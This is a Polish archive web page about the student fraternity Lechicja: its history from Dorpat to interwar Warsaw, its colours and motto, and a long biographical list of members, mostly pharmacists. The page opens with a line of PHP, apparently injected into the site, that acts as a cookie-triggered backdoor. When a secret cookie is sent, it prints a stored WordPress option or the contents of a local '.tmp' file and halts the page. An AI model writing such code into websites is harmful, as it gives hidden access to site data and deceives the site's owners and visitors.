if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Lechicja

Dekiel Ireneusza Komorowskiego Nazwa:
Polska Korporacja Akademicka Lechicja
Siedziba:
1897-1915 Dorpat, od 1921 r. Warszawa
Data powstania:
1897 r.
Barwy:
szafirowa – złota – czerwona (symbolika barw: wierność, siła ducha, męstwo)
Dewiza:
„Doctrina ac labore ad victoriam” („Nauką i pracą do zwycięstwa”)

Rys historyczny

Herb Lechicji, 1925 r.

Lechicja kontynuowała tradycje Znicza i Lechicji, polskich korporacji studentów i absolwentów farmacji Uniwersytetu w Dorpacie.

W latach 1921-1922 odbyły się w Warszawie zjazdy Dorpatczyków, byłych członków Znicza i Lechicji. Postanowiono o wznowieniu przez Lechicję działalności w odrodzonej Ojczyźnie. Zdecydowano jednocześnie, że zgodnie z tradycją Znicza, warszawska Lechicja będzie kontynuować działalność z zachowaniem zwyczajów korporacyjnych. Decyzja ta prawdopodobnie nie satysfakcjonowała wszystkich dawnych Dorpatczyków, gdyż z inicjatywy i pod opieką Jana Muszyńskiego w 1921 r. powstało w Wilnie - będące inną, niekorporacyjną formą kontynuacji tradycji dorpackich - Akademickie Towarzystwo Farmaceutyczne “Lechia”.

Pamiątki zawarcia kartelu między Lechicją a Batorią, 1937 r. (?)

W odróżnieniu od dorpackich “Znicza” i “Lechicji”, warszawska Lechicja nie była tylko związkiem studentów i absolwentów farmacji. W pierwszym okresie grupowała słuchaczy Uniwersytetu Warszawskiego, a od 1923 r. stała się organizacją międzyuczelnianą. W latach 30-tych, po tzw. reformach jędrzejewiczowskich, stałą się znowu organizacją międzywydziałową Uniwersytetu.

Uroczystości XXXV-lecia Lechicji, Warszawa 1932 r.

Lechicja w 1923 r. przyjęta została na członka rzeczywistego do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 1897 r.). W latach 1933-1938 pozostawała poza jego strukturami.

Dnia 23 (21) listopada 1926 r. zawarła na 10 lat kartel z wileńską K! Batoria (2 maja 1937 r. przedłużony na wieczysty) oraz ze lwowską K! Lutyko-Venedya w 1929 r.

Uroczystości XL-lecia Lechicji, Warszawa 1937 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 354 nazwiska, w tym sześciu członków honorowych.

W okresie powojennym przez wiele lat odbywały się nieoficjalnie spotkania Lechitów, którzy organizowali komerse i imprezy okolicznościowe. W latach 70-tych do Korporacji przyjęty został wnuk Juliusza oraz syn Włodzimierza Kijewskich Zbigniew Kijewski. W 2004 r. Lechicja została reaktywowana.

Lista członków

Poniższa, niekompletna lista członków Lechicji obejmuje ponad trzysta nazwisk nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Zygmunt Cybichowski, prof. UW, konstytucjonalista, członek honorowy K! Lechicja w Warszawie
 2. Tadeusz Danielewicz, student farmacji UD, członek K! Znicz w Dorpacie, miał opowiedzieć się za zaprzestaniem działalności przez K! Znicz i przekazaniem majątku Lechicji, pierwszy prezes Lechicji 1908, członek honorowy Lechicji w Dorpacie, farmaceuta
 3. Jan Gessner, (19 listopada 1886 - 26 kwietnia 1953) syn Edwarda, student farmacji UD, członek Lechicji w Dorpacie, wiceprezes sem. jes. 1909, prezes ok. 1910, członek honorowy Lechicji w Dorpacie, prowizor UD 1911, mgr Petersburg 1916, właściciel apteki i Zakładów Chemiczno-Farmaceutycznych, w 1926 wiceprezes Polskiego Powszechnego Towarzystwa Farmaceutycznego i w 1932 Prezes Warszawskiego Towarzystwa Farmaceutycznego, pochowany na cmentarzu powązkowskim w Warszawie
 4. Grabowski, ksiądz, profesor, członek honorowy K! Lechicja w Warszawie

  Jan Muszyński, ok. 1910 r.

 5. Jan Muszyński, (3 lipca 1884 w Wólce Nosowskiej k. Białej Podlaskiej - 28 kwietnia 1957 w Łodzi) - prowizor UD 1909, mgr farmacji UD 1915, członek honorowy Lechicji w Dorpacie, w 1921 organizator Oddziału Farmaceutyczny przy Wydziale Lekarskim USB w Wilnie, a w nim pierwszej w kraju samodzielnej Katedry Farmakognozji i Uprawy Roślin Leczniczych, od 1921 inicjator i opiekun Akademickiego Towarzystwa Farmaceutycznego “Lechia” - jednej z kontynuacji dorpackiej Lechicji, w 1923 profesor nadzwyczajny i dyrektor wileńskiego Oddziału Farmaceutycznego, a w 1937 profesor zwyczajny, współautor Farmakopei Polskiej z 1937, w czasie drugiej wojny światowej w Warszawie jeden z najaktywniejszych wykładowców Tajnego Studium Farmaceutycznego, w czasie Powstania Warszawskiego pełnił cywilną służbę w powstańczych oddziałach sanitarnych, od 1945 w Łodzi organizator i pierwszy dziekan Wydziału Farmaceutycznego w tworzącym UŁ. Był członkiem wielu towarzystw, rad i komitetów naukowych, m.in. 1953-57 w Komitecie Nauk Medycznych PAN, współzałożyciel i pierwszy prezes Polskiego Towarzystwa Farmaceutycznego (1947-50) oraz twórca (1953), przewodniczący oraz członek honorowy (1956) Oddziału Łódzkiego PTFarm, w pracach Oddziału Łódzkiego Towarzystwa Przyrodników im. Kopernika, Polskiego Towarzystwa Botanicznego i Łódzkiego Towarzystwa Naukowego, od 1948 współpracował z Komisją Farmakopei Polskiej III, pochowany na cmentarzu w łódzkiej dzielnicy Radogoszcz

 6. Roman Potocki, Filister honorowy warszawskiej Lechicji i lwowskiej Lutyko-Venedyi (?)

Członkowie rzeczywiści

 1. Wacław Adamski, (1881-1924) prowizor UD 1910, członek Lechicji w Dorpacie, pochowany na cmentarzu powązkowskim w Warszawie
 2. Juljusz Ambroziewicz, (1888 - ) prowizor UD 1914, członek Lechicji w Dorpacie, właściciel apteki w Tomaszowie Mazowieckim
 3. Janina Ambroziewicz, członek ‘gość’ Lechicji w Dorpacie
 4. Antoni Andrzejewski, student farmacji UD, członek Lechicji w Dorpacie
 5. Ziemowit Andrzejewski, student WSH, c. 1932, akt. 1932
 6. Andruszkiewicz,
 7. Mieczysław Antol, student farmacji UD, członek Lechicji w Dorpacie
 8. Władysław Antoszewski, student prawa UW, c. 1927/28 (?), akt. 1927-28
 9. Apelman, student UD, członek K! Znicz w Dorpacie
 10. Franciszek Augustowski, student farmacji UD, członek Lechicji w Dorpacie, farmaceuta, apteka w Wilnie
 11. Mieczysław Bajankiewicz, (1885 - ) prowizor UD 1914, członek Lechicji w Dorpacie, major, Kierownictwo Zaopatrzenia Sanitarnego (Warszawa Powązki ul. Elbląska)
 12. Zofia Baranowska, student farmacji UD, członek Lechicji w Dorpacie
 13. Marian Adam Barszczewski, (1883 - ) prowizor UD 1911, członek Lechicji w Dorpacie, właściciel apteki w Kraśniku
 14. Zygmunt Bauer, (1900 - ) akt. 1924-28, mgr UW 1929, właściciel apteki w Siennie (kieleckie)
 15. Franciszek Bądziński, student farmacji UD, członek Lechicji w Dorpacie
 16. Kazimierz Bądziński, student farmacji UD, członek Lechicji w Dorpacie
 17. Alojzy Tadeusz Bąk, (22 grudnia 1897 w Kobylejgórze - 1940 w Charkowie) s. Augustyna, uczestnik wojny polsko-rosyjskiej 1920, student i absolwent 1929 AMW, członek Venedyi, potem Lutyko-Venedyi, Filister honorowy (?) Lechicji 1938, w 1938 prezes (Warszawskiego ?) Koła Filistrów, dr wet., oficer zawodowy, mjr WP, w wojnie obronnej 1939 w wojskowej pracowni weterynarii, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD, za wojnę 1920 odznaczony Virtuti Militari i Krzyżem Walecznych
 18. Antoni Biegański, student farmacji UD, członek Lechicji w Dorpacie
 19. Edward Biegański, (1884/6 - ) prowizor UD 1914, członek Lechicji w Dorpacie, właściciel apteki w Radziwie (Płock)

  Jerzy Bielawski, 1927 r.

 20. Jerzy Bielawski, (29 maja 1909 w Warszawie - 29/30 września 1940 w Auschwitz) s. Mariana herbu Jelita (dentysty) i Erny z d. Lorenzson, absolwent Gimnazjum Wojciecha Górskiego w warszawie, student i absolwent prawa UW 1928-33, c. 1927/28 (?), akt. 1927/28-32, prezes 1930/31, olderman 1931/32, członek redakcjij miesięcznika “Prawo” organu Koła Prawników UW, aplikant sądowy i adwokacki, członek Zarządu Zrzeszenia Aplikantów Adwokackich w Warszawie, w 1935 wiceprezes, prezes 1936-37, wiceprzes Związku Zrzeszeń Aplikantów Zawodów Prawniczych 1935, w lutym 1939 wpisany na listę adwokacką Okręgowej Izby Adwokackiej w Warszawie, aresztowany przez Niemców 15 lipca 1940 wraz z kilkudziesięcioma adwokatami warszawskimi, więziony na Pawiaku, w połowie sierpnia 1940 wywieziony w pierwszym warszawskim transporcie do obozu koncentracyjnego w Auschwitz, urna z prochami w listopadzie 1940 została złożona w grobie Bortnowskich na warszawskich Powązkach, w 1998 w przeddzień pogrzebu żony przeniosna do grobu jej rodziny na tym samym cmentarzu [Źródła (poza wskazanymi poniżej spisu członków): relacja córki Barbary Bielawskiej-Dębowskiej]

 21. Stanisław Bielicki, (1889 - ) student farmacji UD, członek Lechicji w Dorpacie, prowizor (?) 1928, pracownik apteki w Wiślicy
 22. Stanisław Józef Biernacki, (4 kwietnia 1877 - 12 czerwca 1931) s. Stanisława, student UD 1902-04, prowizor UD 1903, mgr UD 1904, członek K! Znicz w Dorpacie, od 1919 prof. farmakognozji UP, współautor reformy studiów farmaceutycznych w 1919, działacz społeczny, właściciel apteki w Otwocku, organizator Zjazd Dorpatczyków w Poznaniu w 1924, pochowany na warszawskich Powązkach

  Wincenty Bisikiewicz, ok. 1953 r.

 23. Wincenty Bisikiewicz, (20 marca 1888 w Pińczowie - 9 marca 1955 w Zakopanym) syn Franciszka i Agnieszki, student farmacji UD i UJK, członek Lechicji w Dorpacie, mgr farmacji UJK 1923, właściciel apteki w Stężycy pow. Krasnystaw i apteki w Zakopanem

 24. Teofil Bitny-Szlachto, (27 kwietnia 1883 - kwiecień/maj 1945) syn Bazylego, prowizor UD 1908, członek Lechicji w Dorpacie, właściciel apteki w Żarnowie pow. Topolice
 25. Jan Bliziński, akt. 1923-25, olderman 1924/25
 26. Zygmunt Błotnik, student farmacji UD, członek Lechicji w Dorpacie, prezes sem. jes. 1909 i sem. wios. 1910
 27. Bocheński,
 28. Jan Ścibor Ostoja Bogusławski, ( - przed 1973 ?) student SGGW, akt. 1928-31, II wiceprezes sem. let. (?) 1928/29, wiceprezes zewn. 1930/31

  Jan Bolechowski, 1904 r.

 29. Jan Konstanty Bolechowski, (17 lutego 1881 - ) syn Michała, prowizor UD 1904, członek K! Znicz w Dorpacie, właściciel apteki w Pabianicach

 30. Bolesław Borkowski, student farmacji UD, członek Lechicji w Dorpacie
 31. Wacław Breite, student UW, c. 1925/26 (?), akt. 1925/26-28
 32. Janusz Brenstiern-Pfanhauser, (4 maja 1908 - 15 maja 1991) s. Juliana i Eufemii z Doliwa-Łapińskich, brat Zygmunta (Lechicja), student UW 1927-28, student WSH 1928?-32, c. 1928/29, akt. 1928/29-32, sekretarz 1932/33, odznaczony Warszawskim Krzyżem Powstańczym, pochowany na warszawskich Powązkach
 33. Zygmunt Brenstiern-Pfanhauser, (1 maja 1904 w maj. Nieledew - 3 września 1970 w Londynie) s. Juliana i Eufemii z Doliwa-Łapińskich, brat Janusza (Lechicja), student UW, student SNP (1930), c. 1927/28 (?), akt. 1927/28-32, dyrektor Narodowego Instytutu Leków, rotmistrz WP, żołnierz II Korpusu PSZ na Zachodzie, po wojnie na emigracji w Londynie, pochowany na cmentarzu Gunnersbury
 34. Juljusz Brześciański, student UW, c. 1928/29, akt. 1928/29-32, wiceprezes zewn. 1932/33
 35. Dyonizy Buholc, student UW, c. 1929/30, akt. 1929/30
 36. Eugeniusz Sylwester Budzyński, (14 stycznia 1893 w maj. Kobiela k. Koszyc na Kielecczyźnie - 1940 w Katyniu) s. Eugeniusza i Leokadii z ŁApińkiewiczów, matura w Kielcach, student med. UD, najpierw członek Konwentu Polonia (?), a następnie członek ‘gość’ Lechicji w Dorpacie, uczestnik I wojny światowej i wojny 1918-21, legionista, mjr WP, dr med. UW 1924, lekarz zdrojowy w Busku, od 1930 naczelny lekarz uzdrowiska Busko-Zdrój, członek Rady ds. Uzdrowisk Polskich, w wojnie obronnej 1939 dowódca Szpitalu Dywizyjnego w Tarnowie, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD, odznaczony m.in. Złotym Krzyżem Zasługi
 37. Kazimierz Hipolit Budzyński, (1886 - ) prowizor UD 1912, członek Lechicji w Dorpacie, właściciel apteki w Busku Zdroju,
 38. Stanisław Budzyński, (1888 - ) prowizor UD 1914, pracownik apteki Fabickiego w Warszawie, pracownik apteki Fulakowskiego w Działoszycach
 39. Józef Franciszek Büchner, (6 lutego 1879 w Gorzkowie k. Łukowa - 1942) s. Gustawa, prowizor UD 1904, członek K! Znicz w Dorpacie, właściciel apteki w Józefowie k/Otwocka
 40. Bronisław Bujko, student farmacji UD, członek Lechicji w Dorpacie
 41. Marjan Bukowski, student farmacji UD, członek Lechicji w Dorpacie
 42. Stanisław Bulski, student UW, c. 1924/25 (?), akt. 1924/25-28
 43. Roman Burchaciński, student farmacji UD, członek Lechicji w Dorpacie, farmaceuta

  Władysław Burchaciński, lata międzywojenne.

 44. Władysław Burchaciński, (6 kwietnia 1885 w Wieluniu - 1958) prowizor UD 1912, członek Lechicji w Dorpacie, właściciel apteki w Wieluniu,

 45. Albin Burda, (1887 - ) prowizor UD 1913, członek Lechicji w Dorpacie, pracownik apteki Kurkowskiego w Warszawie, a następnie Wierzbięty
 46. Jan Cerhe, c. 1924/25 (?), akt. 1924/25-25
 47. Wiktor Charytonowicz, prowizor UD 1910, członek Lechicji w Dorpacie, zarządzający drogerią w Wilnie
 48. Stanisław Chądzyński, student elektryki PW, c. 1927/28 (?), akt. 1927/28-32
 49. Kazimierz Chmielewski, student UD, członek ‘gość’ Lechicji w Dorpacie
 50. Chorzelski,
 51. Władysław Chrzanowski, (1885-1966) prowizor (UD?) 1913, członek Lechicji w Dorpacie, właściciel apteki w Kaliszu
 52. Zygmunt Chwalibóg-Piecek, student farmacji UD, członek Lechicji w Dorpacie
 53. Chwiłowicz, student UD, członek K! Znicz w Dorpacie
 54. Ciechowski,
 55. Józef Cyranowski, (10 (20?) marca 1887 - 14 listopada 1958 (1950?) student UD i UW, członek Lechicji w Dorpacie, mgr UW 1929, Centrala Zaopatrzenia Ubezpieczalni Społecznej, pochowany na cmentarzu powązkowskim w Warszawie
 56. Stanisław Czajka-Dybowski, student WSH, c. 1927/28 (?), akt. 1927/28-30
 57. Tadeusz Czajkowski, akt. 1924-26, magister, sekretarz Koła Filistrów Lechicji do 1927 (?);
 58. Aleksander Czapliński, student farmacji UD, członek Lechicji w Dorpacie
 59. Stefan Czechowicz, student UD, członek ‘gość’ Lechicji w Dorpacie
 60. Michał Czernik, (1890 - ) prowizor (UD?) 1914, członek Lechicji w Dorpacie, major, apteka Centrum Wyszkolenia Sanitarnego
 61. Edmund Ćwierczakiewicz, student farmacji UD, członek Lechicji w Dorpacie
 62. Władysław Ćwikliński, student farmacji UD, członek Lechicji w Dorpacie
 63. Stefan Danielecki, student PW, c. 1929/30, akt. 1929/30-32, wiceprezes wewn. 1932/33
 64. Michał Daniłow, student PW, c. 1927/28 (?), akt. 1927/28-32
 65. Józef Daniłowicz, student farmacji UD, członek Lechicji w Dorpacie
 66. Lucjan Dąbrowski, student farmacji UD, członek Lechicji w Dorpacie
 67. Zygmunt Dmochowski, c. 1924/25 (?), akt. 1924/25-25
 68. Dobraczyński,
 69. Wacław Domański, (1883 - ) prowizor UD 1909, członek Lechicji w Dorpacie, właściciel apteki w Siewierzu,
 70. Mieczysław Dowiakowski-Gintowt, student PW, c. 1924/25 (?), akt. 1924/25-32
 71. Michał Doroszewski, (?)
 72. Stanisław Dybowski, student WSH, akt. 1931-32

  Adam Dzierżewicz, 1914 r.

 73. Adam Dzierżewicz, ( - 1920) student farmacji UD, członek Lechicji w Dorpacie

 74. Zygmunt Dzierżewicz, student UW, c. 1930/31, akt. 1930/31-32, żołnierz II Korpusu, kampania włoska, po wojnie na emigracji w Argentynie, wrócił do kraju w latach 70-tych
 75. Jan Władysław Ejbich, (13 stycznia 1885 w Mławie - 1941 w Auschwitz) s. Zygmunta i Walentyny z d. Wąsowicz, student w Dorpacie i Warszawie, prowizor Warszawa 1913 i Saratów 1916 członek Lechicji w Dorpacie, właściciel apteki w Ostrowie Mazowieckim, farmacueta wojskowy 1920-32, później pracował w aptekach warszawskich, aresztowany przez Gestapo i osadzony w obozie w Auschwitz, gdzie miał prowadzić aptekę obozową, zginął w Auschwitz
 76. Mieczysław Ehrenkreutz, student farmacji UD, członek Lechicji w Dorpacie
 77. Stanisław Emgacher, c. 1924/25 (?), akt. 1924/25-25
 78. Aleksander Ende, (1887 - ) (1887 - ) student farmacji UD, członek Lechicji w Dorpacie, prezes ok. 1912, prowizor UD 1913, właściciel apteki w Tuszynie
 79. Karol Narcyz Eubig, (29 października 1882 w Kielcach - ) prowizor UD 1909, członek Lechicji w Dorpacie, właściciel apteki w Milanówku, następnie pracownik w Pułtusku, w Stoczku
 80. Jan Eytner, (1906 - 1944 na Wschodzie ?) student farmacji (?) UW, c. 1927/28 (?), akt. 1927/28-31, mgr farmacji 1932 (?)
 81. Jan Fabicki, (26 maja 1889 w Końskich - 1969) dyplom UD 1913, członek Lechicji w Dorpacie, dr farm. Nancy 1923, właściciel apteki w Warszawie
 82. Marcin Fijałkowski, student WSH, c. 1930/31, akt. 1930/31
 83. Wiesław Fiszer, student WWP, akt. 1924-30
 84. Teofil Folfasiński, student farmacji UD, członek Lechicji w Dorpacie
 85. Emil Franke, (1887 - po 1950), prowizor UD 1914, właściciel apteki w Tomaszowie Lubelskim, pochowany na cmentarzu powązkowskim w Warszawie
 86. Tadeusz Garwoliński, student weterynarii UW, c. 1927/28 (?), akt. 1927/28-32, sekretarz sem. let. (?) 1928/29, I wiceprezes 1929/30, wiceprezes wewn. 1930/31
 87. Józef Gasperowicz, student farmacji UD, członek Lechicji w Dorpacie

  Wacław Gębczyński, Dorpat 1904 r.

 88. Wacław Gębczyński, student farmacji UD, członek K! Znicz w Dorpacie, prowizor Moskwa 1908, pracownik apteki w Ciechocinku a następnie zarządzający apteką ST. Mejstra we Włocławku

 89. Glinkiewicz,
 90. Ignacy Głogowski, student weterynarii UW, c. 1925/26 (?), akt. 1925/26-29
 91. Edward Gobiec, (4 września 1886 - 15 sierpnia 1958) student farmacji UD, członek Lechicji w Dorpacie, sekretarz zamiejscowy sem. jes. 1909, sekretarz miejscowy sem. wios. 1910, prowizor UD 1911, znawca fitoterapii, plantator ziół leczniczych, właściciel Fabryki Chemicznej „Ege” 1921-1932, współwłaściciel Towarzystwa Przemysłu Chemicznego Edward Gobiec 1934-1944, producent leków roślinnych, członek Warszawskiego Towarzystwa Farmaceutycznego, Polskiego Komitetu Zielarskiego i Związku Polskiego Przemysłu Farmaceutycznego, pochowany na cmentarzu powązkowskim w Warszawie
 92. Stanisław Gołębiowski, (1878 - 12 grudnia 1971) teść Andrzeja Piętki (Lechicja), prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Ostrowi Mazowieckiej, pochowany na warszawskich Powązkach
 93. Stefan Golędzinowski, (1903-1980 w Argentynie) student leśnictwa SGGW, c. 1924/25 (?), akt. 1924/25-29, prezes sem. let. 1927/28, I wiceprezes 1929/30, wiceprezes zewnętrzny ZPKA 1928-30 (VIII kadencja), ekonomista i finansista, dyrektor Domów Akademickich, w czasie wojny w ZWZ-AK ps. “Golski”, odtwórca przedwojennego 3 Batalionu Pancernego i jego dowódca, po 1945 na emigracji w Argentynie
 94. Zofja Gosiewska, (1888 - ) student UD i UW, członek Lechicji w Dorpacie, magister UW 1921, pracownica apteki Szpitala Św. Łazarza

  Ignacy Grabowski, 1910 r.

 95. Ignacy Grabowski, student farmacji UD, członek Lechicji w Dorpacie, prezes ok. 1918, prowizor UD 1914, mgr farm. UJK 1923, właściciel apteki w Piątku

 96. Stanisław Grąbczewski, student UD, członek ‘gość’ Lechicji w Dorpacie
 97. Bolesław Grochowski, student prawa UW, c. 1924/25 (?), akt. 1924/25-29, I wiceprezes sem. let. 1927/28, prawnik, adwokat
 98. Jerzy Grochowski, (1909 - ) student PW, c. 1929/30, akt. 1928/29-32, wiceprezes wewn. 1931/32, absolwent PW, mgr inż. elektryk
 99. Karol Gruhn, c. 1924/25 (?), akt. 1924/25-25
 100. Tadeusz Gruszczyński, (1889 - ) prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Przedeczu pow. Włocławek
 101. Antoni Grygałowski, s. Jerzego, student UD, członek K! Znicz w Dorpacie
 102. Aleksander Adolf Grygier (Gryger), (1884 - ) prowizor UD 1911, członek Lechicji w Dorpacie, dzierżawca apteki Zielińskiego ul. Puławska 68 w Warszawie

  Władysław Grzymała, 1904 r.

 103. Władysław Grzymała, (12/24 listopada 1877 w Rytele Olechny w d. gub. siedleckiej - ) syn Franciszka i Ewy z Pogorzeckich, prowizor UD 1905, członek K! Znicz w Dorpacie, wraz z Józefem Papużyńskim, zakupił od Feliksa Filipowicza aptekę przy ul. Lubelskiej (obecnie 34) w Chełmie, w 1911 sprzedał połowę apteki Józefowi Papużyńskiemu. Po wyjeździe z Chełma zamieszkał we wsi i gminie Wadyka pow. Siedlce, w 1905 Państwo Grzymałowie wspólnie z państwem Papużyńskimi, Kuszami, Piotrowskimi zawiązali kółko amatorskie. Reżyserami i aktorami byli na zmianę Józef Papużyński, Antoni Kusz i Władysław Grzymała

 104. Marjan Guliński, ( - 1920) student farmacji UD, członek Lechicji w Dorpacie
 105. Tadeusz Gurbiel, (15 maja 1908 w Olkuszu - 26 sierpnia 1993 w Warszawie) syn Józefa i Stefanii z d. Burakowskiej, student WSH, student UJ Kraków (1930), c. 1927/28 (?), akt. 1927/28-32, sekretarz 1929/30, w czasie okupacji w NOW i AK, uczestnik powstania warszawskiego na Woli i w Śródmieściu w batalionie “Gustaw”, odznaczony Krzyżem Walecznych, po powstaniu w obozie jenieckim w Niemczech, do Polski wrócił w 1947, pracował w Biurze Odbudowy Stolicy, a następnie w Ministerstwie Gospodarki Komunalnej, działacz społeczny w PTTK, w środowisku kombatanckim żołnierzy NOW-AK, przewodnik GOT
 106. Stanisław Gurynowicz, student prawa UW, c. 1925/26 (?), akt. 1925/26-30, I wiceprezes sem. zim. 1928/29,
 107. Stefan Gutowski, (1879 - ) student farmacji UD, członek K! Znicz w Dorpacie, mgr 1903 lub 1913, właściciel apteki w Szczurowej
 108. Stefan Gutowski, c. 1924/25 (?), akt. 1924/25-25
 109. Ludwik Hajkowicz, student farmacji UD, członek Lechicji w Dorpacie
 110. Stanisław Hanczke, c. 1924/25 (?), akt. 1924/25-25
 111. Aleksander Hermel, akt. 1924-26
 112. Józef Hamburg, (1885 - ) prowizor UD 1912, członek Lechicji w Dorpacie, zarządzający apteką sukc. Danieleckiego w Łodzi
 113. Tadeusz Hoffman, (1882 - ) prowizor (UD?) 1909, członek Lechicji w Dorpacie, Apteka Ubezpieczalni Społecznej w Poznaniu
 114. Hrynaśkiewicz,
 115. Aleksander Hübner, (ok. 1891 - 4 maja 1955) student farmacji UD, członek Lechicji w Dorpacie, ostatni (?) sekretarz w Dorpacie sem. wios. 1915, prowizor UD 1916, współwłaściciel apteki i Zakładów Przemysłowo-Handlowych Dr Farm. K.Wende SA, pochowany na cmentarzu powązkowskim w Warszawie
 116. Gustaw Wilhelm Indrykie (Indryke), (1885 - ) prowizor UD 1912, członek Lechicji w Dorpacie, właściciel apteki w Ozorkowie a następnie w Drobinie pow. Płock
 117. Jan Iwanowski, student farmacji UD, członek Lechicji w Dorpacie
 118. Marjan Jabłonowski, (1882 - ) prowizor (UD?) 1909, członek Lechicji w Dorpacie, właściciel apteki w Biłgoraju
 119. Adam Jackiewicz, student prawa UW, c. 1924/25 (?), akt. 1924/25-29, sekretarz 1925/26
 120. Marjan Jackowski, student farmacji UD, członek Lechicji w Dorpacie
 121. Marceli Jagiełłowicz, akt. 1924-26

  Wincenty Jakubowski, ok. 1934 r.

 122. Wincenty Jakubowski, (1 kwietnia 1886 w Siedlcach - 11 kwietnia 1960 w Warszawie) s. Jana i Franciszki z d. Wąszewska, pomocnik aptekarski 1903, członek Lechicji w Dorpacie, prowizor Kijów 1909, mgr Moskwa 1915, dr farm. UW 1934, ppłk WP 1919-1934, uczestnik wojny polsko-rosyjskiej 1920, w tym wyprawy kijowskiej, przewodniczący Komisji normalizacyjnej 1924, od 1936 właściciel apteki w Warszawie przy ul. Świętokrzyskiej 14, uczestnik wojny obronnej 1939, po jej zakończeniu przedostał się do Rumunii, gdzie przez całą wojnę uczył chemii w gimnazjum dla polskich uciekinierów, po wojnie kierownik apteki G. Gessnera w Alejach Jerozolimskich 11, pochowany na warszawskich Powązkach

 123. Zygmunt Jankiewicz, (1888 - ) członek Lechicji w Dorpacie, prowizor UW 1928, insp. Farm. Zw. Kas Chorych, następnie przedstawiciel naukowy f. „Motor”
 124. Wacław Henryk Jankowski, (18 kwietnia 1876 w Warszawie - ) s. Józefa, student farmacji UD, członek K! Znicz w Dorpacie
 125. Jan Jarzębowski, (1885 - ) prowizor UD 1913, członek Lechicji w Dorpacie, właściciel apteki w Rudzie Pabianickiej
 126. Zenon Jan Jaworski, (30 październik 1897 w Warszawie - 1940 w Charkowie) syn Jana, akt. 1924-26, mgr farmacji UW 1927, pracownik apteki Messnera, porucznik, sekretarz Koła Filistrów Lechicji od (?) 1927, w niewoli sowieckiej, zamordowany przez NKWD
 127. Jesionowski,
 128. Wojciech Jużkiewicz, student farmacji UD, członek Lechicji w Dorpacie
 129. Jerzy Kaczyński, student PW, c. 1929/30, akt. 1929/30-31, sekretarz 1930/31, wiceprezes zewn. 1931/32
 130. Stanisław Kalinowski, prowizor UD 1906, członek K! Znicz w Dorpacie, właściciel apteki w Kaliszu
 131. Janina Kałwajć-Gulińska, (1884 - ) prowizor UD 1912, właściciel apteki w Zwierzyńcu (lubelskim)
 132. Hipolit Leon Kamocki, (4 lutego 1882 - 1940 w Charkowie) s. Antoniego, student farmacji UD, członek Lechicji w Dorpacie, sekretarz miejscowy sem. jes. 1909, wiceprezes sem. wios. 1910, prowizor UD 1910, właściciel apteki w Wierzbniku (kieleckie), kpt rez służby zdrowia, przydzielony do kadry zapasowej 4 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD
 133. Tadeusz Kapuściński, (1884? - 1921) syn Władysława, absolwent (medycyny?) UD 1910, pochowany na Powązkach
 134. Janusz Karchowski, student UW, c. 1929/30, akt. 1929/30-32, prezes 1932/33
 135. Zygmunt Karczewski, ( - przed 1973 ?) nazywany “Gryzmuś”, student Warszawa, a następnie prawa USB 1927, członek Lechicji, akt. 1924-32, w Wilnie także członek Batorii (?), prezes Związku Kół Prowincjonalnych 1929/30, członek Wileńskiego Koła Akademickiego 1930/31
 136. Stanisław Karolewski, (?) (1903 - 3 sierpnia 1978) magister, pedagog, major AK ps. “Lechita”, żołnierz 36 pułku Legii Akademickiej, wojny obronnej 1939, Powstania Warszawskiego, działacz ZNP i ZBOWiD, odznaczony Virtuti Militarii, Krzyżem Oficerskim OOP, Krzyżem Walecznych, Krzyżem Partyzanckim, Złotą Odznaką ZNP
 137. Arnold von von Kennel, członek ‘gość’ Lechicji w Dorpacie
 138. Bogdan Kiełczewski, student UD, członek ‘gość’ Lechicji w Dorpacie

  Juljusz Kijewski, 1937 r.

 139. Juljusz Kijewski, (1881 w Warszawie - 9 grudnia 1941 w Warszawie) s. Andrzeja i Marii z Michniewiczów, ojciec Włodzimierza (Lechicja), prowizor UD 1908, członek K! Znicz w Dorpacie, właściciel apteki w Kaliszu oraz wytwórni wody sodowej i rozlewni piwa “Zdrój”, współwłaściciel fabryki chemicznej w Kaliszu, po sprzedaży apteki w Kaliszu przeniósł się do Warszawy, właściciel aptek przy ul. Żelaznej i przy ul. Zamenhoffa 23 w Warszawie, pochowany na warszawskich Powązkach

 140. Włodzimierz Andrzej Kijewski, (14 sierpnia 1914 w maj. rodzinnym Rydygierów w Czartkach k. Kalisza - 22 listopada 1989 w Warszawie) s. Juliusza (Lechicja, farmaceuty) i Marii z Rydygierów, absolwent farmacji UW 1939, w czasie wojny pracował w aptece swojego ojca przy ul. Żelaznej, którą po jego śmierci w 1941 sam prowadził do wybuchu powstania warszawskiego oraz ponownie od 1945, od okresu przedwojennego przez cały okres wojny w aptece pracowała mgr farmacji narodowości żydowskiej, po upaństwowieniu aptek przez pół roku nadal kierownik apteki, a następnie zwolniony z tzw. wilczym biletem, po kilkumiesięcznych poszukiwaniach pracy został zatrudniony jako kierownik jednoosobowego punktu aptecznego w Ministerstwie Finansów, gdzie pracował do 1968, kiedy ponownie został zwolniony jako były właściciel apteki, następnie pracował do 1979 w Związku Spółdzielni Inwalidzkich, pochowany w grobie rodzinnym na warszawskich Powązkach
 141. Henryk Kolasiński, (ok. 1882 - 27 września 1934 w Warszawie) student farmacji UD, członek Lechicji w Dorpacie, skarbnik sem. jes. 1909 i sem. wios. 1910, prowizor UD 1911, były właściciel apteki w Opocznie
 142. Witosław Kolisko, student UD, członek ‘gość’ Lechicji w Dorpacie
 143. Tadeusz Komicz, ( - przed 1973) student WSH, c. 1927/28 (?), akt. 1927/28-32, II skarbnik ZPKA 1928 (VII kadencja)
